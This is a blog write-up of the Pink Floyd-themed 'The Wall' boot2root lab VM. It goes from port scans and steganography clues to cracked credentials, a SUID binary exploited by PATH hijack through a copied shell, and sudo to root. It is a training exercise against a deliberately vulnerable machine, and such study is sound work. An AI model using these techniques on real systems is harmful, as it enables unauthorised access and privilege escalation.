published on in writeup
tags: the wall

The Wall: 1

In 1965, one of the most influential bands of our times was formed.. Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd’s contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd.

You challenge is simple… set your controls for the heart of the sun, get root, and grab the flag! Rock on!

Xerubus asked if I would like to beta-test this VM prior to release and being a bit of a (closet) Pink Floyd fan, I jumped at the opportunity. So obviously the first stage in any boot2root is to port scan the sucker.

[email protected]:~$ nmap -n -sT 192.168.56.104

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-02 19:52 GMT
Stats: 0:01:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Nmap scan report for 192.168.56.104
Host is up.
All 1000 scanned ports on 192.168.56.104 are filtered

Straight up trolled already. I fired up Wireshark and after a minute or so, I saw a boat load of ARPs coming from The Wall - looking like an ARP scan.

If dug past the ARPs, and found a TCP packet destined for my IP on port 1337.

It looks like this is running on a cron, so I setup a netcat listener to catch the connection.

[email protected]:~$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.104] 21840

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'   
   
              The Wall by @xerubus
          -= Welcome to the Machine =-

If you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice

Ok… brilliant, now what?

Well if you port scan the VM for a second time, it appears to have opened up a port.

[email protected]:~$ nmap -n -sT 192.168.56.104

PORT   STATE SERVICE
80/tcp open  http

There is nothing to see on the page, with the exception of this image.

In the HTML source, there is also the following:

If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall

Did you know? The Publius Enigma is a mystery surrounding the Division Bell album.  Publius promised an unspecified reward for solving the 
riddle, and further claimed that there was an enigma hidden within the artwork.

737465673d3333313135373330646262623337306663626539373230666536333265633035

That string is totally hex, which we can decode like so:

>>> string = '737465673d3333313135373330646262623337306663626539373230666536333265633035'
>>> string.decode('hex')
'steg=33115730dbbb370fcbe9720fe632ec05'

steg is a pretty solid clue, and probably relates to the image on the web page. This other string is MD5 and can be pretty easily cracked - turns out to be divisionbell.

So let’s download pink_floyd.jpg and run it through some steg tools.

[email protected]:~/Downloads$ steghide extract -sf pink_floyd.jpg 
Enter passphrase: 
wrote extracted data to "pink_floyd_syd.txt".

[email protected]:~/Downloads$ cat pink_floyd_syd.txt 
Hey Syd,

I hear you're full of dust and guitars? 

If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0

Roger

Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd.  The name was inspired
by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in 
his collection.

So we have a new base64 and MD5 string.

[email protected]:~/Downloads$ echo -en 'U3lkQmFycmV0dA==' | base64 -d
SydBarrett

f831605ae34c2399d1e5bb3a4ab245d0 == pinkfloydrocks

So we have what looks like a set of credentials. SydBarrett:pinkfloydrocks. But where to use them?

SydBarrett

I was stuck here for a while, but if we do a ‘wider’ port scan, we find that port 1965 is open.

[email protected]:~$ nmap -n -sT -p- 192.168.56.104


PORT     STATE SERVICE
80/tcp   open  http
1965/tcp open  unknown

[email protected]:~$ nc 192.168.56.104 1965
SSH-2.0-OpenSSH_7.0

Protocol mismatch.

SSH - so maybe we can SSH in as Syd.

[email protected]:~$ ssh [email protected] -p 1965

[email protected]'s password: 
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 192.168.56.104 closed.

Ok, SFTP it is. Let’s connect and see if we can find any interesting files.

[email protected]:~$ sftp -P 1965 [email protected]
[email protected]'s password: 
Connected to 192.168.56.104.

sftp> ls -la
drwxr-xr-x    3 0        1000          512 Oct 24 18:17 .mail
-rw-r--r--    1 0        1000         1912 Oct 25 22:56 bio.txt
-rw-r--r--    1 0        1000       868967 Oct 24 16:17 syd_barrett_profile_pic.jpg

sftp> ls -la .mail/
drwxr-xr-x    2 0        1000          512 Nov 11 10:25 .stash
-rw-r--r--    1 0        1000          309 Oct 24 18:18 sent-items

sftp> ls -la .mail/.stash/
-rw-r--r--    1 0        1000     48884479 Aug  7 14:33 eclipsed_by_the_moon

sftp> get .mail/sent-items 
Fetching /.mail/sent-items to sent-items
   
sftp> get .mail/.stash/eclipsed_by_the_moon 
Fetching /.mail/.stash/eclipsed_by_the_moon to eclipsed_by_the_moon
[email protected]:~$ cat sent-items 
Date: Sun, 24 Oct 1965 18:45:21 +0200
From: Syd Barrett <[email protected]>
Reply-To: Syd Barret <[email protected]>
To: Roger Waters <[email protected]>
Subject: Had to hide the stash

Roger... I had to hide the stash. 

Usual deal.. just use the scalpel when you find it.

Ok, sorry for that.

Rock on man

"Syd"

scalpel is a clue here.

[email protected]:~$ file eclipsed_by_the_moon 
eclipsed_by_the_moon: gzip compressed data, last modified: Wed Nov 11 00:15:47 2015, from Unix

After we extract the content, we find it’s actually a disk image.

[email protected]:~$ file eclipsed_by_the_moon.lsd 
eclipsed_by_the_moon.lsd: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", sectors/cluster 2, reserved sectors 8, root entries 512, Media descriptor 0xf8, sectors/FAT 188, sectors/track 63, heads 255, hidden sectors 2048, sectors 96256 (volumes > 32 MB) , serial number 0x9e322180, unlabeled, FAT (16 bit)

It won’t boot, so we go back to our scalpel clue. Scalpel is a tool for recovering deleted files - so lets see if we can recover anything. The first stage is to mod /etc/scalpel/scalpel.conf and uncomment all the different types of files you want to look for.

[email protected]:~$ scalpel eclipsed_by_the_moon.lsd 
jpg with header "\xff\xd8\xff\xe0\x00\x10" and footer "\xff\xd9" --> 1 files
Scalpel is done, files carved = 1, elapsed = 0 seconds.

A new directory is created, scalpel-output, within which is a recovered image.

RogerWaters

So now we have the password for RogerWaters, hello_is_there_anybody_in_there. Let’s try and connect via SSH this time.

[email protected]:~$ ssh [email protected] -p 1965
[email protected]'s password: 
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'   
$ 

w00t shell.

Nick Mason

After some standard Linux enumeration, we get a list of all users on the system. It’s logical to assume that we will have to progress through each user before reaching root.

SydBarrett:*:1000:1000:Syd Barrett:/home/SydBarrett:/sbin/nologin
NickMason:*:1001:1001:Nick Mason:/home/NickMason:/bin/ksh
RogerWaters:*:1002:1002:Roger Waters:/home/RogerWaters:/bin/ksh
RichardWright:*:1003:1003:Richard Wright:/home/RichardWright:/bin/ksh
DavidGilmour:*:1004:1004:David Gilmour:/home/DavidGilmour:/bin/ksh

If we have a look for SUID and/or SGID files, we find two interesting binaries.

$ find / -perm -4000 -print 2> /dev/null                 
/usr/local/bin/brick
/usr/local/bin/shineon

$ ls -l /usr/local/bin/brick                                                                                                                                 
-rws--s--x  1 NickMason  NickMason  7291 Aug  8 00:33 /usr/local/bin/brick
$ ls -l /usr/local/bin/shineon                                                                                                                               
-rwsr-s---  1 DavidGilmour  RichardWright  7524 Oct 25 07:58 /usr/local/bin/shineon

We don’t have the privileges to execute shineon yet, so let’s look at brick.

$ /usr/local/bin/brick                                                                                                                                       

What have we here, laddie?
Mysterious scribbings?
A secret code?
Oh, poems, no less!
Poems everybody!

Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory

$ id
uid=1001(NickMason) gid=1001(NickMason) groups=1002(RogerWaters)
$ whoami
NickMason

Richard Wright

In each home directory thus far, there has been a profile picture of the band member. Although Nick’s is something else in disguise.

$ file nick_mason_profile_pic.jpg                                                                                                                            
nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, created by: Xiph.Org libVorbis I

Listening to the track, you will notice some morse code. You can obviously decode it by ear, or load the spectrograph and do it visually.

The string we eventually come out with is richardwright1943farfisa.

$ su RichardWright 
Password:
ksh: Cannot determine current working directory
$ id
uid=1003(RichardWright) gid=1003(RichardWright) groups=1003(RichardWright)

David Gilmour

Now we are Richard Wright, we can go back to the shineon binary we found previously.

$ /usr/local/bin/shineon                                                                                                                                     
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit

Trying out these functions, we can see that they are executing pre-defined shell commands. If we run strings, we can see that all but one is called with an absolute path.

$ strings /usr/local/bin/shineon                                                                                                                             

Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
Quitting program!
Invalid choice!
load_menu
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail

mail will be vulnerable to a PATH hijack.

$ cp /bin/ksh /tmp/mail                                                                                                                                      
$ export PATH=/tmp:$PATH
$ /usr/local/bin/shineon                                                                                                                                     
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
mail: Cannot determine current working directory
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)

In his home directory is a file called anotherbrick.txt.

$ cat anotherbrick.txt                                                                                                                                       
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond

New website for review:    pinkfloyd1965newblogsite50yearscelebration-temp/index.php

# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs 

If we head over to this new directory, we get the following page:

As before, there is a clue in the HTML source.

Through the window in the wall, come streaming in on sunlight wings, a million bright ambassadors of morning. - Pink Floyd, Echoes
Can you see what the Dog sees? Perhaps hints of lightness streaming in on sunlight wings?

Download homepageimg.jpg and have a close look around where the dog is sitting. You can just make out some black text.

To get a better look at this, I simply messed around with the brightness and contrast levels.

We can’t navigate to \welcometothemachine in a browser.

403 Forbidden
OpenBSD httpd

If we have a look on the actual VM.

$ ls -l /var/www/                                                                                                                                            

drwxr-x---  4 www   welcometothemachine  512 Nov 27 01:47 htdocs

$ ls -l /var/www/htdocs/                                                                                                                                     
ls: /var/www/htdocs/: Permission denied

Even though we are part of the correct group our current privileges don’t reflect that, and on BSD apparently you can’t just run newgrp.

$ cat /etc/group 
welcometothemachine:*:1005:DavidGilmour

$ id             
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)

$ newgrp welcometothemachine
mail: newgrp: not found

So we have to find another way of inheriting DavidGilmour’s group privs. We can do just that with his password, that we find hidden in david_gilmour_profile_pic.jpg.

$ strings david_gilmour_profile_pic.jpg                                                                                                                      
who_are_you_and_who_am_i

$ su DavidGilmour
Password:
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)

Now we can get in the directory.

$ ls -l /var/www/htdocs/welcometothemachine/                                                                                                                 
total 16
-rws--s---  1 root  welcometothemachine  7513 Nov 27 01:47 PinkFloyd

$ ./PinkFloyd                                                                                                                                                
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer:

If we recall the other string in homepageimg.jpg: 50696e6b466c6f796435305965617273. This is more hex which we can decode.

>>> string = '50696e6b466c6f796435305965617273'
>>> string.decode('hex')
'PinkFloyd50Years'

Maybe this is the correct answer?

$ ./PinkFloyd  
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: PinkFloyd50Years

Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh

Nope, ok… After a while, I just shoved the raw hex in.

$ ./PinkFloyd  
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: 50696e6b466c6f796435305965617273

Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless

Congratulations... permission has been granted.
You can now set your controls to the heart of the sun!

root

permission granted is a little cryptic. It took me a while to realise it had given DavidGilmour sudo rights.

$ sudo -l
Password: 
Matching Defaults entries for DavidGilmour on thewall:
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User DavidGilmour may run the following commands on thewall:
    (ALL) SETENV: ALL

So now we can just elevate, no problem.

$ sudo -i
# whoami
root

Grab the flag.

# cat /root/flag.txt                                                                                                                                         

"The band is fantastic, that is really what I think. Oh, by the way, which one is Pink? - Pink Floyd, Have A Cigar"

                   Congratulations on rooting thewall!

   ___________________________________________________________________
  | |       |       |       |       |       |       |       |       | |
  |_|_______|_______|______ '__  ___|_______|_______|_______|_______|_|
  |     |       |       |   |  )      /         |       |       |     |
  |_____|_______|_______|__ |,' , .  | | _ , ___|_______|_______|_____|
  | |       |       |      ,|   | |\ | | ,' |       |       |       | |
  |_|_______|_______|____ ' | _ | | \| |'\ _|_______|_______|_______|_|
  |     |       |       |   \  _' '  ` |  \     |       |       |     |
  |_____|_______|_______|_  ,-'_ _____ | _______|_______|_______|_____|
  | |       |       |   ,-'|  _     |       |       |       |       | |
  |_|_______|_______|__  ,-|-' |  ,-. \ /_.--. _____|_______|_______|_|
  |     |       |          |   |  | |  V  |   ) |       |       |     |
  |_____|_______|_______|_ | _ |-'`-'  |  | ,' _|_______|_______|_____|
  | |       |       |      |        |  '  ;'        |       |       | |
  |_|_______|_______|______"|_____  _,- o'__|_______|_______|_______|_|
  |     |       |       |       _,-'    .       |       |       |     |
  |_____|_______|_______|_ _,--'\      _,-'_____|_______|_______|_____|
  | |       |       |     '     ||_||-' _   |       |       |       | |
  |_|_______|_______|_______|__ || ||,-'  __|_______|_______|_______|_|
  |     |       |       |       |  ||_,-'       |       |       |     |
  |_____|_______|______.|_______.__  ___|_______|_______|_______|_____|
  | |       |       |   \    |     /        |       |       |       | |
  |_|_______|_______|___ \ __|___ /,  _ |   | ______|_______|_______|_|
  |     |       |       | \      // \   |   |   |       |       |     |
  |_____|_______|_______|_ \ /\ //--'\  |   | __|_______|_______|_____|
  | |       |       |       '  V/    |  |-' |__,    |       |       | |
  |_|_______|_______|_______|_______ _______'_______|_______|_______|_|
  |     |       |       |       |       |       |       |       |     |
  |_____|_______|_______|_______|_______|_______|_______|_______|_____|
  |_________|_______|_______|_______|_______|_______|_______|_______|_|

                  Celebrating 50 years of Pink Floyd!
             Syd Barrett (RIP), Nick Mason, Roger Waters,
               Richard Wright (RIP), and David Gilmour.


** Shoutouts **
+ @vulnhub for making it all possible
+ @rastamouse @thecolonial - "the test bunnies"

-=========================================-
-  xerubus (@xerubus - www.mogozobo.com)  -
-=========================================-

It was also nice to read through the contents of /root/scripts/ to see how the VM works.

Many thanks to xerubus, and thanks for letting me beta-test :)